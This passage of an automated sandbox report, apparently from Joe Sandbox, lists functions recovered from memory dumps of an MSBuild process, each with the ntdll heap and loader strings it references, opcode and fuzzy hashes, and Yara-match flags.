Source File: 0000000A.00000002.2455604371.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_fc0000_MSBuild.jbxd

Similarity

API ID:
String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
API String ID: 0-3178619729
Opcode ID: e909dd0de03985ba294ef8eba34e060b3e6ab5e24a4c0ad95adb56eb8da5310a
Instruction ID: 1de39fc38558b7ab4c3a39af7bb797d98ffb876fb8fb56356d9bb4940b8a9a76
Opcode Fuzzy Hash: e909dd0de03985ba294ef8eba34e060b3e6ab5e24a4c0ad95adb56eb8da5310a
Instruction Fuzzy Hash: 8BE2B270A00655CFEB26CF58C890BADBBF1FF49304F148199EA85EB386D735A845CB94

Uniqueness

Uniqueness Score: -1.00%

Function 00402644 Relevance: 5.3, Strings: 4, Instructions: 341COMMON

Download Yara Rule

Strings

gfff, xrefs: 004026D6
gfff, xrefs: 00402730
gfff, xrefs: 004028D9
gfff, xrefs: 00402943

Memory Dump Source

Source File: 0000000A.00000002.2443671664.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID:
String ID: gfff$gfff$gfff$gfff
API String ID: 0-2178600047
Opcode ID: 7ad2c1793a6d9825f7fcd082d7b5cadd3dcaa77885a72902560d360db31541e7
Instruction ID: 956ccea77f94fd95d024a09a4f073621b3725fe32ab46d284af21c74002a7fb8
Opcode Fuzzy Hash: 7ad2c1793a6d9825f7fcd082d7b5cadd3dcaa77885a72902560d360db31541e7
Instruction Fuzzy Hash: 0AA1F932B0041647CF2C891DCE9837A7256EBD4304F58823BD946EF3D5E9B9AD1287C8

Uniqueness

Uniqueness Score: -1.00%

Function 00402650 Relevance: 5.3, Strings: 4, Instructions: 294COMMON

Download Yara Rule

Strings

gfff, xrefs: 004026D6
gfff, xrefs: 00402730
gfff, xrefs: 004028D9
gfff, xrefs: 00402943

Memory Dump Source

Source File: 0000000A.00000002.2443671664.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID:
String ID: gfff$gfff$gfff$gfff
API String ID: 0-2178600047
Opcode ID: 54c28387d97817124f8147e9f2804053e58d003c1e9791df71d6c6356218fb1d
Instruction ID: f626aa0c6537accaef190aeb84b81081135e8bf3bc7fbb79030ba96b60d7c711
Opcode Fuzzy Hash: 54c28387d97817124f8147e9f2804053e58d003c1e9791df71d6c6356218fb1d
Instruction Fuzzy Hash: A0910672B0051A47CB2C891DDE9867EB256EBD4304F18823BDD46EF3D1EAB9AD1187C4

Uniqueness

Uniqueness Score: -1.00%

Function 00FFA3C0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON

Download Yara Rule

Strings

LdrResFallbackLangList Enter, xrefs: 00FFA3EF
LdrResFallbackLangList Exit, xrefs: 00FFA3FF
8, xrefs: 00FFA3E7
6, xrefs: 00FFA3F7

Memory Dump Source

Source File: 0000000A.00000002.2455604371.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_fc0000_MSBuild.jbxd

Similarity

API ID:
String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
API String ID: 0-379654539
Opcode ID: 8c3a3a0e40170aab750c356c262edc2211422abe647ee34f25f9c867e4cda87b
Instruction ID: 2a8ff80a05df4986b6e352ea6ee73d4b1484417fec3c232308dc45606064770a
Opcode Fuzzy Hash: 8c3a3a0e40170aab750c356c262edc2211422abe647ee34f25f9c867e4cda87b
Instruction Fuzzy Hash: EBC19CB550838ACFC711DF58C140B7AB7E4BF84704F08486AFA998B2A1E774C945EB63

Uniqueness

Uniqueness Score: -1.00%

Function 00402669 Relevance: 5.3, Strings: 4, Instructions: 266COMMON

Download Yara Rule

Strings

gfff, xrefs: 004026D6
gfff, xrefs: 00402730
gfff, xrefs: 004028D9
gfff, xrefs: 00402943

Memory Dump Source

Source File: 0000000A.00000002.2443671664.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID:
String ID: gfff$gfff$gfff$gfff
API String ID: 0-2178600047
Opcode ID: 1bdce2473b1ba37981f67eb91bc7827fcdd255259a2db32661e9b1b513d075e1
Instruction ID: d23ccb407dff6a6a57fd3ab73e611fae1435b0d7126a4d8799c332cb9e0c8b8c
Opcode Fuzzy Hash: 1bdce2473b1ba37981f67eb91bc7827fcdd255259a2db32661e9b1b513d075e1
Instruction Fuzzy Hash: D781D472B0051A47CF2C891DDE5827A7256EBE8304F58823BDD46EF3D1EAB8AD1187C4

Uniqueness

Uniqueness Score: -1.00%

Function 01028402 Relevance: 5.3, Strings: 4, Instructions: 263COMMON

Download Yara Rule

Strings

LdrpInitializeProcess, xrefs: 01028422
@, xrefs: 01028591
\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 0102855E
minkernel\ntdll\ldrinit.c, xrefs: 01028421

Memory Dump Source

Source File: 0000000A.00000002.2455604371.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_fc0000_MSBuild.jbxd

Similarity

API ID:
String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
API String ID: 0-1918872054
Opcode ID: 29d9e171ccae37e7af8d9197f76545bd6ab25351bacb44a2bd0ec7315601e3e7
Instruction ID: 110e85014749019ed660191315c0642a3740bb0cc9d5ff2f4ad2fce804ced605
Opcode Fuzzy Hash: 29d9e171ccae37e7af8d9197f76545bd6ab25351bacb44a2bd0ec7315601e3e7
Instruction Fuzzy Hash: 7491B971508356AFE722DE25CC41FABBAECBF88784F40492EFAC486151E735D904CB62

Uniqueness

Uniqueness Score: -1.00%

Function 01000C00 Relevance: 5.3, Strings: 4, Instructions: 260COMMON

Download Yara Rule

Strings

ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock, xrefs: 010555AE
HEAP: , xrefs: 010554E0, 010555A1
((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock)), xrefs: 010554ED
HEAP[%wZ]: , xrefs: 010554D1, 01055592

Memory Dump Source

Source File: 0000000A.00000002.2455604371.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_fc0000_MSBuild.jbxd

Similarity

API ID:
String ID: ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock))$HEAP: $HEAP[%wZ]: $ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock
API String ID: 0-1657114761
Opcode ID: 7f9f214adfce5d1843f8105e9fe127b33c061cf8385faf5f982e960deda8fb49
Instruction ID: b6fbbcad062dbb50e3ed7bff6c90298cf4fe9e8c5de1c10f4409ec0881ec1d35
Opcode Fuzzy Hash: 7f9f214adfce5d1843f8105e9fe127b33c061cf8385faf5f982e960deda8fb49
Instruction Fuzzy Hash: 0BA1F33060074A9FE726DF28C841BBFBBE1BF44744F1485AAE5C68B28AD734E944C761

Uniqueness

Uniqueness Score: -1.00%

Function 00FF64AB Relevance: 5.2, Strings: 4, Instructions: 211COMMON

Download Yara Rule

Strings

ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 01051028
ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 0105106B
ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 01050FE5
ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 010510AE

Memory Dump Source

Source File: 0000000A.00000002.2455604371.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_fc0000_MSBuild.jbxd

Similarity

API ID:
String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
API String ID: 0-1468400865
Opcode ID: bb369e45dcb908341b5df5a4337d205319d96a3962ce5469d7e8ae45c2ae259e
Instruction ID: a677ebc4e5d8cabe24cee1e4cadb4efe5fd9494fbe8fe4c12e7b131d0b77d534
Opcode Fuzzy Hash: bb369e45dcb908341b5df5a4337d205319d96a3962ce5469d7e8ae45c2ae259e
Instruction Fuzzy Hash: C171F3B19043099FCB60DF14C884BAB7BE8AF94764F080469FD889B196D774D588DBD2

Uniqueness

Uniqueness Score: -1.00%

Function 010115F4 Relevance: 5.2, Strings: 4, Instructions: 166COMMON

Download Yara Rule

Strings

minkernel\ntdll\ldrmap.c, xrefs: 0105A59A
Could not validate the crypto signature for DLL %wZ, xrefs: 0105A589
MZER, xrefs: 010116E8
LdrpCompleteMapModule, xrefs: 0105A590

Memory Dump Source

Source File: 0000000A.00000002.2455604371.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_fc0000_MSBuild.jbxd

Similarity

API ID:
String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$MZER$minkernel\ntdll\ldrmap.c
API String ID: 0-1409021520
Opcode ID: cd9ce50c463fa8331e42a52eb8db92adfcba7e504a2768d49f852cffc5edaffc
Instruction ID: 12906805b35548d718ed167c4f707b6a2d274a4efb0e9df0107cfe05cb6468cb
Opcode Fuzzy Hash: cd9ce50c463fa8331e42a52eb8db92adfcba7e504a2768d49f852cffc5edaffc
Instruction Fuzzy Hash: A9512570700745DBEBA6DA2CC944B6A7BE5BF08714F180BA5EBD19B2DAC739E800C740

Uniqueness

Uniqueness Score: -1.00%

Function 010A11A4 Relevance: 5.1, Strings: 4, Instructions: 113COMMON

Download Yara Rule

Strings

HEAP: , xrefs: 010A124A, 010A125D, 010A125F, 010A12C4
Heap %p - headers modified (%p is %lx instead of %lx), xrefs: 010A1261
This is located in the %s field of the heap header., xrefs: 010A12D6
HEAP[%wZ]: , xrefs: 010A123D, 010A12B7

Memory Dump Source

Source File: 0000000A.00000002.2455604371.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_fc0000_MSBuild.jbxd

Similarity

API ID:
String ID: This is located in the %s field of the heap header.$HEAP: $HEAP[%wZ]: $Heap %p - headers modified (%p is %lx instead of %lx)
API String ID: 0-336120773
Opcode ID: 32ce0d87b65f5b0cfcd53f438f279e410f592bb79ccc1b5f4ddf4a4097f90d8c
Instruction ID: fe0b1b9999bf01bcf49dba01568f109d0b8779b994ca15ed350ee048eeec9bef
Opcode Fuzzy Hash: 32ce0d87b65f5b0cfcd53f438f279e410f592bb79ccc1b5f4ddf4a4097f90d8c
Instruction Fuzzy Hash: 8831FE71240151EFD711DBD8C982FAA7BE8EF05B60F580096F581CB292E734EC90EB65

Uniqueness

Uniqueness Score: -1.00%

Function 0101245A Relevance: 5.1, Strings: 4, Instructions: 111COMMON

Download Yara Rule

Strings

LdrpDynamicShimModule, xrefs: 0105A998
minkernel\ntdll\ldrinit.c, xrefs: 0105A9A2
apphelp.dll, xrefs: 01012462
Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 0105A992

Memory Dump Source

Source File: 0000000A.00000002.2455604371.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_fc0000_MSBuild.jbxd

Similarity

API ID:
String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
API String ID: 0-176724104
Opcode ID: 0e6020f312462ccaa47696fd73a22f070f2a03f43c7dcfa3729c6c6a8f515b36
Instruction ID: 9576fc743de4fa638a7f13f85fc5aa0f1944cba8dd3d06b37cfc91207ab3819a
Opcode Fuzzy Hash: 0e6020f312462ccaa47696fd73a22f070f2a03f43c7dcfa3729c6c6a8f515b36
Instruction Fuzzy Hash: 88316875B00201EBDB719F5A9941EAFBBF4FB84B14F150199E9C0AF249C7799881C780

Uniqueness

Uniqueness Score: -1.00%

Function 00FE9148 Relevance: 5.1, Strings: 4, Instructions: 100COMMON

Download Yara Rule

Strings

HEAP: , xrefs: 0104BAAD, 0104BAEA
VirtualProtect Failed 0x%p %x, xrefs: 0104BABA
VirtualQuery Failed 0x%p %x, xrefs: 0104BAF7
HEAP[%wZ]: , xrefs: 0104BAA0, 0104BADD

Memory Dump Source

Source File: 0000000A.00000002.2455604371.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_fc0000_MSBuild.jbxd

Similarity

API ID:
String ID: HEAP: $HEAP[%wZ]: $VirtualProtect Failed 0x%p %x$VirtualQuery Failed 0x%p %x
API String ID: 0-1391187441
Opcode ID: b65dde49d9473006eb70824b483dd5aaa25f7b03f96e94200ec46ae134d360fe
Instruction ID: 996cb8d91754ae84d3cbeed717e23669ab9aa873bd79bb4335814f36b2c27416
Opcode Fuzzy Hash: b65dde49d9473006eb70824b483dd5aaa25f7b03f96e94200ec46ae134d360fe
Instruction Fuzzy Hash: 1231D232A00156EFCB01DB4ACC85FAEB7F9EF45B60F144065E914A7291D7B4ED80DA61

Uniqueness

Uniqueness Score: -1.00%

Function 010029A0 Relevance: 4.7, Strings: 3, Instructions: 966COMMON

Download Yara Rule

Strings

HEAP: , xrefs: 01003264
Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 0100327D
HEAP[%wZ]: , xrefs: 01003255

Memory Dump Source

Source File: 0000000A.00000002.2455604371.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_fc0000_MSBuild.jbxd

Similarity

API ID:
String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
API String ID: 0-617086771
Opcode ID: f739fd7447f94062ed476f76696a45002f1da12d418c4b590199c10ba107f996
Instruction ID: 2572527e2f1079ac4b354197177bf0eadb643d4f44691dcbbc1cf106c306c4a2
Opcode Fuzzy Hash: f739fd7447f94062ed476f76696a45002f1da12d418c4b590199c10ba107f996
Instruction Fuzzy Hash: 0792CF70A04649DFEB26CF68C4447AEBBF1FF48304F1880A9E999AB391D735A945CF50

Uniqueness

Uniqueness Score: -1.00%

Function 010802C0 Relevance: 4.4, Strings: 3, Instructions: 611COMMON

Download Yara Rule

Strings

MitigationOptions, xrefs: 01080326
MitigationAuditOptions, xrefs: 0108032D
"""", xrefs: 010804D0

Memory Dump Source

Source File: 0000000A.00000002.2455604371.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_fc0000_MSBuild.jbxd

Similarity

API ID:
String ID: """"$MitigationAuditOptions$MitigationOptions
API String ID: 0-1670051934
Opcode ID: 65f81638c71f2e122c12bed51026775c17193844669817897035ed82805f3e42
Instruction ID: 490b379a88e99722a2804b7ff19366ea45117578af119728329fc7324cab32f6
Opcode Fuzzy Hash: 65f81638c71f2e122c12bed51026775c17193844669817897035ed82805f3e42
Instruction Fuzzy Hash: 8C22A072A087028FE764DF2DC85162AFBE1BBD8314F24892EF1DA87658D771D548CB41

Uniqueness

Uniqueness Score: -1.00%

Function 01001F92 Relevance: 4.3, Strings: 3, Instructions: 563COMMON

Download Yara Rule

Strings

HEAP: , xrefs: 0100212E, 01055E53, 01056001, 0105614B
HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 0100216B, 01055E68, 01056016, 01056160
HEAP[%wZ]: , xrefs: 01002155, 01055E46, 01055FF4, 0105613E

Memory Dump Source

Source File: 0000000A.00000002.2455604371.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_fc0000_MSBuild.jbxd

Similarity

API ID:
String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
API String ID: 0-3178619729
Opcode ID: 6ab95ba58494fd14e02e8d7759c485967d2332e593a9b2e8ce8ff5256aeff299
Instruction ID: d6ecf93b78fb95da2f5317cc2ca04db7ea73582dcf74dacdb0e3de3ab6948d41
Opcode Fuzzy Hash: 6ab95ba58494fd14e02e8d7759c485967d2332e593a9b2e8ce8ff5256aeff299
Instruction Fuzzy Hash: 3D2204706006429FEB56DF28C895BBBBBF5FF05704F188499E9C58B282D776E881CB50

Uniqueness

Uniqueness Score: -1.00%

Function 01000770 Relevance: 4.2, Strings: 3, Instructions: 414COMMON

Download Yara Rule

Strings

HEAP: , xrefs: 010550BD
(UCRBlock->Size >= *Size), xrefs: 010550CA
HEAP[%wZ]: , xrefs: 010550AE

Memory Dump Source

Source File: 0000000A.00000002.2455604371.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_fc0000_MSBuild.jbxd

Similarity

API ID:
String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
API String ID: 0-4253913091
Opcode ID: c586f2bbc52aacd4bf8706b06d1d361d2161185855934dddc8b61c6179c94c41
Instruction ID: ff4d44ca0e8a5f2560cd7b67147a2d7731de3a1bd545b8bf42c66f8e3ee347f1
Opcode Fuzzy Hash: c586f2bbc52aacd4bf8706b06d1d361d2161185855934dddc8b61c6179c94c41
Instruction Fuzzy Hash: 15F1BF30600606DFEB56CF68C894BAEBBF5FF45340F1481A8E9969B385D734E981CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00FF1460 Relevance: 4.1, Strings: 3, Instructions: 385COMMON

Download Yara Rule

Strings

HEAP: , xrefs: 00FF1596
HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 00FF1728
HEAP[%wZ]: , xrefs: 00FF1712

Memory Dump Source

Source File: 0000000A.00000002.2455604371.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_fc0000_MSBuild.jbxd

Similarity

API ID:
String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
API String ID: 0-3178619729
Opcode ID: 1642253b5dd8284e9ccd60f82ead82314637f92a2e1e09122aebc5c5be3a0db7
Instruction ID: 560a31da9ea7a1ea7b1233bd374e413c91b43bcccf7e399b7b44b8bf3fc42fea
Opcode Fuzzy Hash: 1642253b5dd8284e9ccd60f82ead82314637f92a2e1e09122aebc5c5be3a0db7
Instruction Fuzzy Hash: 36E10371A0424ADBDB25CF68C491BBABBF1BF84310F18856DE6D6CB256D734E840EB50

Uniqueness

Uniqueness Score: -1.00%

Function 01016962 Relevance: 4.0, Strings: 2, Instructions: 1492COMMON

Download Yara Rule

Strings

@, xrefs: 01016C24
, xrefs: 0105CA51

Memory Dump Source

Source File: 0000000A.00000002.2455604371.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_fc0000_MSBuild.jbxd

Similarity

API ID:
String ID: $@
API String ID: 0-1077428164
Opcode ID: 77dbeb7fdfd717a28d88c941daefc1ba2cd4188dce75272736501e7c82d6bfd6
Instruction ID: 4cb7340015a22da5762e1ddcff778e02b81409f7954cdc1abbd3dab2fb78ad6c
Opcode Fuzzy Hash: 77dbeb7fdfd717a28d88c941daefc1ba2cd4188dce75272736501e7c82d6bfd6
Instruction Fuzzy Hash: 2EC29B716083419FEB65CF28C880BABBBE5BF88704F04896DF9C987245D779D845CB92

Uniqueness

Uniqueness Score: -1.00%

Function 00FEA197 Relevance: 4.0, Strings: 3, Instructions: 238COMMON

Download Yara Rule

Strings

FilterFullPath, xrefs: 0104C2E6
UseFilter, xrefs: 00FEA1C1
\??\, xrefs: 0104C1E4

Memory Dump Source

Source File: 0000000A.00000002.2455604371.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_fc0000_MSBuild.jbxd

Similarity

API ID:
String ID: FilterFullPath$UseFilter$\??\
API String ID: 0-2779062949
Opcode ID: 0f76f7b895936890af23d30ae7fc353854ea469a39eb5b1bb437087feb5d133a
Instruction ID: eb9a314986107daca4e0ce298f173c3db0dd149008a1061023142f1a5fae11fc
Opcode Fuzzy Hash: 0f76f7b895936890af23d30ae7fc353854ea469a39eb5b1bb437087feb5d133a
Instruction Fuzzy Hash: 9BA18E719012299BEB31DF24CD88BEAB7B8FF44710F1041EAEA49A7250D735AE85CF50

Uniqueness

Uniqueness Score: -1.00%

Function 01077410 Relevance: 4.0, Strings: 3, Instructions: 233COMMON

Download Yara Rule

Strings

VirtualAlloc, xrefs: 010775FC
Objects=%4u, xrefs: 010775EA
Objects>%4u, xrefs: 010775D5

Memory Dump Source

Source File: 0000000A.00000002.2455604371.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_fc0000_MSBuild.jbxd

Similarity

API ID:
String ID: Objects=%4u$Objects>%4u$VirtualAlloc
API String ID: 0-3870751728
Opcode ID: bc66725f3425ed6d2752c9beb24cff827c5acadfaa0f860f14d2b176566ca8a7
Instruction ID: 1705c4a27181508efd7566afaadfd574a624c2913c8ce8180b9bca0fffd2f5de
Opcode Fuzzy Hash: bc66725f3425ed6d2752c9beb24cff827c5acadfaa0f860f14d2b176566ca8a7
Instruction Fuzzy Hash: D1916CB0E002059FEB58CF69C484BADBBF1BF48344F14C16AE945AB395E7759841CF98

Uniqueness

Uniqueness Score: -1.00%

Function 00FFB440 Relevance: 4.0, Strings: 3, Instructions: 221COMMON

Download Yara Rule

Strings

LdrpResGetResourceDirectory Enter, xrefs: 00FFB465
LdrpResGetResourceDirectory Exit, xrefs: 00FFB477
{, xrefs: 010537B6

Memory Dump Source

Source File: 0000000A.00000002.2455604371.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_fc0000_MSBuild.jbxd

Similarity

API ID:
String ID: LdrpResGetResourceDirectory Enter$LdrpResGetResourceDirectory Exit${
API String ID: 0-373624363
Opcode ID: 7e69496e8e304a3a6d69464a7310918743362c362c8d91d91744734a71bee610
Instruction ID: fd45f1ae1e6bd15341548ffd5edf393371123fc994bb70367f28b2e33d4bd369
Opcode Fuzzy Hash: 7e69496e8e304a3a6d69464a7310918743362c362c8d91d91744734a71bee610
Instruction Fuzzy Hash: 2891CC72E0460ECBDB21CF58C550BBEB7B1FF00764F2841D5E951AB2A1D7789A81EB90

Uniqueness

Uniqueness Score: -1.00%

Function 0102909C Relevance: 3.9, Strings: 3, Instructions: 199COMMON

Download Yara Rule

Strings

@, xrefs: 01029148
&, xrefs: 01065CF8
%, xrefs: 01065D3F

Memory Dump Source

Source File: 0000000A.00000002.2455604371.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_fc0000_MSBuild.jbxd

Similarity

API ID:
String ID: %$&$@
API String ID: 0-1537733988
Opcode ID: d1232af2fc8895df1246b6bce90273a7ba68db49d723f57e7099ef2e12b39ba3
Instruction ID: 1b70470821e6cf5c7ed47f7b6f30ed064c0fdecaccf8d0bde544b0a1fedfef50
Opcode Fuzzy Hash: d1232af2fc8895df1246b6bce90273a7ba68db49d723f57e7099ef2e12b39ba3
Instruction Fuzzy Hash: 5A71DE706083269FC714DF29C980A6FBBE9FF95718F108A5DE4DA87291C731D809CB92

Uniqueness

Uniqueness Score: -1.00%

Function 0109DAAC Relevance: 3.9, Strings: 3, Instructions: 163COMMON

Download Yara Rule

Strings

Heap block at %p modified at %p past requested size of %Ix, xrefs: 0109DC32
HEAP: , xrefs: 0109DC1F
HEAP[%wZ]: , xrefs: 0109DC12

Memory Dump Source

Source File: 0000000A.00000002.2455604371.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_fc0000_MSBuild.jbxd

Similarity

API ID:
String ID: HEAP: $HEAP[%wZ]: $Heap block at %p modified at %p past requested size of %Ix
API String ID: 0-3815128232
Opcode ID: 1f98e0df85162b4f24fd7609b118cdfaf52e09b9360a195df437319cb196609b
Instruction ID: 5119e721d63b6753957914e846bd5d249ab9a42a12b69d2f7bc647d5dd112f09
Opcode Fuzzy Hash: 1f98e0df85162b4f24fd7609b118cdfaf52e09b9360a195df437319cb196609b
Instruction Fuzzy Hash: 7D516635184151CAEBA4CEAEC86477677E2EF55784F04488AE5C2CB285D37AE842FB21

Uniqueness

Uniqueness Score: -1.00%

Function 010AC188 Relevance: 3.9, Strings: 3, Instructions: 123COMMON

Download Yara Rule

Strings

PreferredUILanguages, xrefs: 010AC212
@, xrefs: 010AC1F1
\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 010AC1C5

Memory Dump Source

Source File: 0000000A.00000002.2455604371.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_fc0000_MSBuild.jbxd

Similarity

API ID:
String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
API String ID: 0-2968386058
Opcode ID: 32b2f0687e20e4f67aa82fe87247cef5c7d9a82a8478ce8a8576d3dc5e8a880b
Instruction ID: dce03a1cc3356a32f3460ef7b0d70b9759fc23edd41c491342f5688a13d9d8a6
Opcode Fuzzy Hash: 32b2f0687e20e4f67aa82fe87247cef5c7d9a82a8478ce8a8576d3dc5e8a880b
Instruction Fuzzy Hash: C6418271E00209EBEF15DAD8C941FEEBBF8AB54700F45406AE649F7280D7749E448B50

Uniqueness

Uniqueness Score: -1.00%

Function 01084144 Relevance: 3.9, Strings: 3, Instructions: 121COMMON

Download Yara Rule

Strings

LdrpResValidateFilePath Exit, xrefs: 01084172
LdrpResValidateFilePath Enter, xrefs: 01084160
@, xrefs: 01084225

Memory Dump Source

Source File: 0000000A.00000002.2455604371.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_fc0000_MSBuild.jbxd

Similarity

API ID:
String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
API String ID: 0-1373925480
Opcode ID: 3d4e45c6d8274781837a5d708d8b338b3d51bc91eb9c351c8e1478cf33ee3421
Instruction ID: f6bfe605b454c3ecb8833e067d6adae6825c148b4dffe4a41d6db990254fcdd4
Opcode Fuzzy Hash: 3d4e45c6d8274781837a5d708d8b338b3d51bc91eb9c351c8e1478cf33ee3421
Instruction Fuzzy Hash: 5841F431A0865A8FEB22EBA9C840BADBBF5FF65340F14049AD9C1EF791D7348901CB10

Uniqueness

Uniqueness Score: -1.00%

Function 010233A0 Relevance: 3.9, Strings: 3, Instructions: 111COMMON

Download Yara Rule

Strings

Actx , xrefs: 010233AC
SXS: %s() passed the empty activation context data, xrefs: 010629FE
RtlCreateActivationContext, xrefs: 010629F9

Memory Dump Source

Source File: 0000000A.00000002.2455604371.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_fc0000_MSBuild.jbxd

Similarity

API ID:
String ID: Actx $RtlCreateActivationContext$SXS: %s() passed the empty activation context data
API String ID: 0-859632880
Opcode ID: 5527a2637344a23d7f3236d550827f31b5cf9ee11a37b677dbeab445b7826cc0
Instruction ID: ce520f31d9c32c2ae12d485cd2b46535f18ba347ffcc9eb727b34f5863209a27
Opcode Fuzzy Hash: 5527a2637344a23d7f3236d550827f31b5cf9ee11a37b677dbeab445b7826cc0
Instruction Fuzzy Hash: E0311632600316DFEB26DE58D884F9A77E9BB48B10F0584A9ED859F281CB75E941C790

Uniqueness

Uniqueness Score: -1.00%

Function 0107B594 Relevance: 3.9, Strings: 3, Instructions: 107COMMON

Download Yara Rule

Strings

GlobalFlag, xrefs: 0107B68F
@, xrefs: 0107B670
\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\, xrefs: 0107B632

Memory Dump Source

Source File: 0000000A.00000002.2455604371.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_fc0000_MSBuild.jbxd

Similarity

